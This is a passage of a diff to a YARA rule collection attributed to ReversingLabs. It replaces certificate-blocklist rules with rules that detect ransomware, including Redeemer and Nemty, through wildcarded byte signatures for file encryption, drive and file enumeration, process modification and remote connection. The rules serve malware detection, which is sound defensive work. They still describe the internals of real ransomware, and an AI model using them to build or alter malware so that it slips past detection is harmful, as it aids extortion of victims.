+            D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ??
+            66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF ?? 66 0F 6F CB 66 0F
+            72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 6F CD 66 0F 72 F5
+            ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66
+            0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72
+            F5 ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF
+            ?? 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 0F 85 ?? ?? ?? ?? 66 0F FE
+            7C 24 ?? 66 0F 7E C0 66 0F FE F4 66 0F FE DA 66 0F FE E8 40 F3 0F 7F B4 24 ?? ?? ??
+            ?? F3 0F 7F 9C 24 ?? ?? ?? ?? F3 0F 7F BC 24 ?? ?? ?? ?? F3 0F 7F AC 24 ?? ?? ?? ??
+            89 84 24 ?? ?? ?? ?? 89 F2 31 C9 83 E2 ?? 83 FB ?? 8D 04 17 0F 82 ?? ?? ?? ?? 31 C9
+        }
+		$encrypt_files_full_v1_p3 = {
+            83 FB ?? 72 ?? 03 54 24 ?? 89 F7 89 D9 83 E7 ?? 89 7C 24 ?? 29 F9 31 FF 66 2E 0F 1F
+            84 00 ?? ?? ?? ?? 66 90 F3 0F 6F 44 3A ?? F3 0F 6F 94 3C ?? ?? ?? ?? F3 0F 6F 0C 3A
+            F3 0F 6F 9C 3C ?? ?? ?? ?? 66 0F EF D0 66 0F EF D9 F3 0F 7F 54 3A ?? F3 0F 7F 1C 3A
+            83 C7 ?? 39 F9 75 ?? 8B 54 24 ?? 85 D2 74 ?? 83 FA ?? 72 ?? 89 F2 89 CF 89 D9 83 E2
+            ?? 29 D1 90 F3 0F 7E 04 38 F3 0F 7E 8C 3C ?? ?? ?? ?? 66 0F EF C8 66 0F D6 0C 38 83
+            C7 ?? 39 F9 75 ?? 85 D2 74 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 40 ?? 0F B6 94 0C
+            ?? ?? ?? ?? 30 14 08 41 39 CB 75 ?? 88 9C 24 ?? ?? ?? ?? 89 F3 8B 74 24 ?? 8B 46 ??
+            8B 7E ?? 29 F8 39 D8 0F 87 ?? ?? ?? ?? 53 8B 7C 24 ?? 57 56 8D 44 24 ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 84 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 89 54
+            24 ?? 89 4C 24 ?? 88 44 24 ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F2 0F 10 44 24 ?? 89 C7 BB ?? ?? ?? ?? F2 0F 11 00 EB
+            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 57 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24
+            ?? 3C ?? 75 ?? 83 7C 24 ?? ?? 74 ?? BB ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? 3C ?? 75 ??
+            8B 5C 24 ?? 8B 73 ?? 8B 3B 8B 06 57 FF D0 83 C4 ?? 8B 46 ?? 85 C0 74 ?? FF 76 ?? 50
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 31 FF 6A ?? 68 ??
+            ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 F8 89 DA 8D 65 ?? 5E 5F 5B 5D C3
+        }
+		$encrypt_files_full_v2_p1 = {
+            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 89 D7 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 89 C3 89 44 24 ?? 0F 85
+            ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 89 7C 24 ?? 89 44 24 ?? EB ?? 66
+            2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 00 8B 06 01 F8 53 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 01 DF 8B 5C 24 ?? 89 7E ?? 89 F7 68 ?? ?? ?? ?? 53 FF 74 24 ?? 8D 44 24 ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F
+            84 ?? ?? ?? ?? 8B 45 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? F2 0F 10 40 ?? F3 0F 7E 48
+            ?? F2 0F 11 41 ?? F2 0F 10 40 ?? 66 0F D6 49 ?? F2 0F 11 41 ?? F2 0F 10 00 8B 42 ??
+            F2 0F 11 01 F3 0F 7E 02 89 44 24 ?? A1 ?? ?? ?? ?? 66 0F D6 44 24 ?? 0F B6 00 3C ??
+            75 ?? E8 ?? ?? ?? ?? F2 0F 10 44 24 ?? F3 0F 7E 4C 24 ?? 8B 44 24 ?? 8D 8C 24 ?? ??
+            ?? ?? 0F B7 54 24 ?? 81 FE ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ??
+            66 0F D6 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84
+            24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F
+            11 44 24 ?? 89 41 ?? F3 0F 7E 44 24 ?? 0F B6 44 24 ?? 66 0F D6 41 ?? C7 41 ?? ?? ??
+            ?? ?? C7 01 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 88 41 ?? 66 89 51
+            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 89 F0
+        }
+		$encrypt_files_full_v2_p2 = {
+            89 5C 24 ?? 89 5C 24 ?? C1 E8 ?? 89 44 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 89 F3 83 E3 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 3C ?? 75 ??
+            8D 4C 24 ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 00 F3 0F 6F 64
+            24 ?? F3 0F 6F 94 24 ?? ?? ?? ?? F3 0F 6F 84 24 ?? ?? ?? ?? F3 0F 6F BC 24 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? 66 0F 6F F4 66 0F 6F DA 66 0F 6F E8 66 0F 7F 7C 24 ?? 0F 1F 84 00
+            ?? ?? ?? ?? 66 0F FE F3 48 66 0F EF EE 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ?? 66
+            0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB
+            D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ??
+            66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF ?? 66 0F 6F CB 66 0F
+            72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 6F CD 66 0F 72 F5
+            ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66
+            0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72
+            F5 ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF
+            ?? 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 0F 85 ?? ?? ?? ?? 66 0F FE
+            7C 24 ?? 66 0F 7E C0 66 0F FE F4 66 0F FE DA 66 0F FE E8 40 F3 0F 7F B4 24 ?? ?? ??
+            ?? F3 0F 7F 9C 24 ?? ?? ?? ?? F3 0F 7F BC 24 ?? ?? ?? ?? F3 0F 7F AC 24 ?? ?? ?? ??
+            89 84 24 ?? ?? ?? ?? 8B 44 24 ?? 89 F2 31 C9 83 E2 ?? 83 FB ?? 8D 04 10 0F 82 ?? ??
+            ?? ?? 31 C9 83 FB ?? 72 ?? 03 54 24 ?? 89 F7 89 D9 83 E7 ?? 89 7C 24 ?? 29 F9 31 FF
+        }
+		$encrypt_files_full_v2_p3 = {
+            0F 1F 84 00 ?? ?? ?? ?? F3 0F 6F 44 3A ?? F3 0F 6F 94 3C ?? ?? ?? ?? F3 0F 6F 0C 3A
+            F3 0F 6F 9C 3C ?? ?? ?? ?? 66 0F EF D0 66 0F EF D9 F3 0F 7F 54 3A ?? F3 0F 7F 1C 3A
+            83 C7 ?? 39 F9 75 ?? 8B 54 24 ?? 8B 7C 24 ?? 85 D2 74 ?? 83 FA ?? 72 ?? 89 F2 89 CF
+            89 D9 83 E2 ?? 29 D1 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 00 F3 0F 7E 04 38 F3 0F 7E
+            8C 3C ?? ?? ?? ?? 66 0F EF C8 66 0F D6 0C 38 83 C7 ?? 39 F9 75 ?? 8B 7C 24 ?? 85 D2
+            74 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F B6 94 0C ?? ?? ?? ?? 30 14 08 41 39 CB 75 ??
+            88 9C 24 ?? ?? ?? ?? 89 F3 8B 47 ?? 89 FE 8B 7F ?? 29 F8 39 D8 0F 87 ?? ?? ?? ?? 53
+            8B 5C 24 ?? 53 56 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 89 F7 3C ??
+            0F 84 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 89 54 24 ?? 89 4C 24 ?? 88 44 24 ?? A1 ??
+            ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F2 0F
+            10 44 24 ?? 89 C7 BB ?? ?? ?? ?? F2 0F 11 00 EB ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 53 FF
+            74 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 75 ?? 83 7C 24 ?? ?? 74 ??
+            BB ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? 3C ?? 75 ?? 8B 5C 24 ?? 8B 73 ?? 8B 3B 8B 06 57
+            FF D0 83 C4 ?? 8B 46 ?? 85 C0 74 ?? FF 76 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 31 FF 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 F8 89 DA 8D 65 ?? 5E 5F 5B 5D C3
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( all of ( $collect_files_recursively_p* ) ) and ( $get_valid_drives ) and ( ( ( all of ( $encrypt_files_full_v1_p* ) ) ) or ( ( all of ( $encrypt_files_full_v2_p* ) ) ) )
+}
+rule REVERSINGLABS_Win32_Ransomware_Redeemer : TC_DETECTION MALICIOUS MALWARE FILE
+{
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Redeemer ransomware."
 		author = "ReversingLabs"
-		id = "dc8a745f-7150-57b7-9ddc-e5a1721d8c02"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "080ab595-862b-5dc2-aaff-a0efd819a9fa"
+		date = "2022-01-17"
+		modified = "2022-01-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3082-L3098"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Redeemer.yara#L1-L105"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "42b068e85b3aff5e6dd5ec4979f546dc5338ebf8719d86c0641ffb8353959af9"
+		logic_hash = "28287f6620a2f7a90057d1f97947e065721119e26398fe659331dc5fe99761de"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Redeemer"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ??
+            8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 89 B5 ?? ??
+            ?? ?? 89 B5 ?? ?? ?? ?? 3B F7 0F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8B 3D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ??
+            C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? C6 45
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 A5 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ??
+            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 75 ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B
+            CC 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0
+        }
+		$encrypt_files_p1 = {
+            80 FB ?? 0F 85 ?? ?? ?? ?? 83 EC ?? 8D 55 ?? 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ??
+            C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2
+            6A ?? 66 89 10 8D 45 ?? 52 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83
+            79 ?? ?? C7 41 ?? ?? ?? ?? ?? 72 ?? 8B 01 EB ?? 8B C1 33 D2 6A ?? 66 89 10 8D 45 ??
+            52 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 8D 45 ?? 3B C6
+            74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ??
+            ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6 45
+        }
+		$encrypt_files_p2 = {
+            8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 35 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ??
+            50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D6 85 C0 0F 85 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 50 FF D6 8B 85 ?? ?? ??
+            ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 45 ?? 83 C4 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33
+            C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8
+        }
+		$modify_processes_p1 = {
+            8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50
+        }
+		$modify_processes_p2 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ?? ?? 6A ?? 8D 04 52 8D 04 C1
+            50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F
+            43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D B5
+            ?? ?? ?? ?? 0F 43 95 ?? ?? ?? ?? 0F 43 B5 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C8 ??
+            50 56 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 6A ?? 8D 8D ?? ?? ??
+            ?? 6A ?? 8D 04 52 8D 04 C1 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 85 ?? ??
+            ?? ?? 8B CC 89 A5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC FF 37 E8
+            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? C6 45 ?? ?? 8D 85 ?? ??
+            ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 FF 77
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ICE ACTIVATION LIMITED" and pe.signatures [ i ] . serial == "72:89:b0:f9:bd:64:1e:3e:35:2d:c3:18:3f:8d:e6:be" and 1557933274 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $modify_processes_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Fd7B7A8678A67181A54Bc7499Eba44Da : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Nemty : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Nemty ransomware."
 		author = "ReversingLabs"
-		id = "d6456cb6-e950-54be-a7f4-5c1d622c6aab"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c56ecd32-5903-5bcc-aa69-a070f2c247c4"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3100-L3118"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Nemty.yara#L1-L205"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f1e26ea26890043be2c8b9c35ba2e6758b60fe173f00bf4c77cc5289ce0d5600"
+		logic_hash = "dc8cfdcdea8ecb2018b1b04bb1b645f6dbdc6c07357719100677c75945edef40"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Nemty"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 8D 75
+            ?? 89 5D ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00
+            53 53 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 6A
+            ?? 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ??
+            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 53 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 32 DB EB ?? B3 ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ??
+            6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ??
+            ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 8B 1D ?? ?? ?? ??
+            50 FF D3 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 59 59
+            72 ?? 8B 00 50 FF D3 33 DB 43 53 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 53 8D 75 ??
+            E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 59 59 FF 75 ?? FF
+        }
+		$remote_connection_p2 = {
+            D6 FF 75 ?? FF D6 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ??
+            83 78 ?? ?? 59 59 72 ?? 8B 00 50 FF 15 ?? ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ??
+            53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 75 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ??
+            ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 C9 51 51 51 50 68 ?? ?? ?? ?? 51 FF 15 ??
+            ?? ?? ?? 53 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 5A 8B C1 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 39 55 ??
+            73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41 3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ??
+            8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D ?? EB ?? 80 39 ?? 75 ?? C6 01 ?? 41
+            3B C8 75 ?? 8B 45 ?? 39 55 ?? 73 ?? 8D 45 ?? 03 45 ?? 8B 4D ?? 39 55 ?? 73 ?? 8D 4D
